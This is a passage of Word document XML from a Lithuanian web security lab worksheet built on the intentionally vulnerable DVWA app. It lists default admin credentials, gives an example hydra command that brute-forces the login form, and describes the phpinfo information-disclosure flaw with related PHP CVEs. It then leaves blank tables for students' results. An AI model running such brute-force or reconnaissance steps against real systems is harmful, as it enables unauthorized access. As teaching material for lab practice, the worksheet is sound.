        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Nuo DVWA </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>pagrindio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (namų) puslapio: " </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Damn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Vulnerable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>App</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (DVWA) yra PHP/MySQL interneto programa, kurie yra pažeidžiami.  Pagrindiniai tikslai būtų saugumo specialistų pagalba išbandyti savo įgūdžius ir įrankius į dirbtinai sukurtą aplinką. Puslapių kūrėjai geriau supras ir užtikrins interneto programų saugumą tiek klasėje, tiek už klasės ribos".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C081CE8" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E49A003" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA papildomos instrukcijos http://www.dvwa.co.uk </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598C619D" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7989ABA8" w14:textId="1DC8BA88" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00876D9A" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Naudot</w:t>
      </w:r>
      <w:r w:rsidR="00CC09C3" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ojo vardas, pagal nutylėjimą  = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CC09C3" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="318B5441" w14:textId="3AAC4B8A" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00876D9A" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Naudot</w:t>
      </w:r>
      <w:r w:rsidR="00CC09C3" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ojo slaptažodis, pagal nutylėjimą  = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CC09C3" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="492BFDC8" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B3B607" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00053DE1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30F90789" wp14:editId="38FAF69D">
            <wp:extent cx="5591908" cy="3143755"/>
            <wp:effectExtent l="0" t="0" r="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05672" cy="3151493"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AA42F1" w14:textId="0ED3B703" w:rsidR="00153DE5" w:rsidRPr="00607DC0" w:rsidRDefault="00153DE5" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B2096A0" w14:textId="77777777" w:rsidR="00053DE1" w:rsidRPr="00607DC0" w:rsidRDefault="00053DE1" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C210B0" w14:textId="77777777" w:rsidR="00053DE1" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Galimas pavyzdys: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DEB935" w14:textId="77777777" w:rsidR="00053DE1" w:rsidRPr="00607DC0" w:rsidRDefault="00053DE1" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="045AF241" w14:textId="0106EDD5" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>http-get-form</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> "/dvwa/login.php:username=^USER^&amp;password=^PASS^&amp;submit=Login:Login </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>failed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300C5492" w14:textId="5873DBE7" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64A16771" w14:textId="77777777" w:rsidR="004B0F8F" w:rsidRPr="00607DC0" w:rsidRDefault="004B0F8F" w:rsidP="004B0F8F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Jūsų gautas rezultatas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC8145A" w14:textId="77777777" w:rsidR="00053DE1" w:rsidRPr="00607DC0" w:rsidRDefault="00053DE1" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29887719" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF"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5C1CEF" w:rsidRPr="00607DC0" w14:paraId="12C96AFA"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734DC3A9"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09581279"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5C1CEF" w:rsidRPr="00607DC0" w14:paraId="5F100FFE" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5419A314"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7692212F" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w14:paraId="0EBAF5A8" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0642704C"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3DDAD21A" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64153E47" w14:textId="69C1B3B5" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47182010" w14:textId="0392E294" w:rsidR="00053DE1" w:rsidRPr="00607DC0" w:rsidRDefault="00053DE1" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="350AF64C" w14:textId="77777777" w:rsidR="00053DE1" w:rsidRPr="00607DC0" w:rsidRDefault="00053DE1" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E031072" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc258656097"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>WEB paslaugų pažeidžiamumas: Informacijos atskleidimas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="28C7BC60" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11927071" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Be to, neapgalvotas PHP informacijos išvedimas (atskleidimas) į puslapį. Tai galima rasti adresu http:// &lt;IP&gt; / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>phpinfo.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. Šiame pavyzdyje, adresas bus </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="00607DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://192.168.56.101/phpinfo.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. PHP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> - informacijos atskleidimo pažeidžiamumas teikia vidaus sistemos informacija ir paslaugų versijų informaciją, kuri gali būti naudojama ieškant spragų. Pavyzdžiui, PHP versija - atskleista versija ekrane yra 5.2.4, gali būti įmanoma, kad sistema yra pažeidžiama CVE-CVE-2012-1823 (žr. </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="00607DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">) CVE-CVE-2012-2311 (žr. </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="00607DC0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2311</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>), kurią PHP iki 5.3.12 ir 5.4.x yra galimybė pažeisti. Vėliau išleistoje 5.4.2 versijoje klaidos ištaisytos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F0500E" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="533BFAFB" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00053DE1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="718FAC03" wp14:editId="65E4DEE1">
            <wp:extent cx="5887330" cy="3309839"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8" name="Picture 8"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98256" cy="3315981"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F185D7A" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F0A47D3" w14:textId="77777777" w:rsidR="004B0F8F" w:rsidRPr="00607DC0" w:rsidRDefault="004B0F8F" w:rsidP="004B0F8F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Jūsų gautas rezultatas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C6F98C" w14:textId="77777777" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AF05CD5" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>(galima pateikti darbalaukio atvaizdą)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2953"/>
        <w:gridCol w:w="6497"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w14:paraId="1B506FEB" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="368"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="72265CE6"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Atliktas veiksmas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6497" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="44C6D7C5" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Rezultatas (paslaugos, prievadai)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w14:paraId="345D0352" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="77E24B8E"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3F7987D6" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w14:paraId="661EB70E" w14:textId="77777777" w:rsidTr="003C0B7F">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6F552DD0" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6497" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="31CB7A47" w14:textId="77777777" w:rsidR="005C1CEF" w:rsidRPr="00607DC0" w:rsidRDefault="005C1CEF" w:rsidP="00C84FB8">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
